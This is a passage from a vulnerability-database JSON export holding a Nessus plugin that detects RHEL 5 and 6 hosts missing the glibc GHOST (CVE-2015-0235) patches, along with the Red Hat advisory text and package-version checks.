(!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["cpe"], "edition": 2, "lastseen": "2017-01-06T22:11:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:6.5", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:glibc", "cpe:/o:redhat:enterprise_linux:6.4", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:6.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "31b14a65c334375d84b653894f01858415cf03e845e608866704eca9664b7285", "hashmap": [{"hash": "8b94a5050c9d70a61ab81e1185b2b938", "key": "modified"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "e010fd952706847a7e7ec9bd37c23380", "key": "cpe"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "eeb90d0f17d72e982721d1e8ad0449e3", "key": "sourceData"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2018-09-09T16:05:41", "modified": "2018-09-07T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.3", "pluginID": "81068", "published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2018/09/07 17:03:12\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if 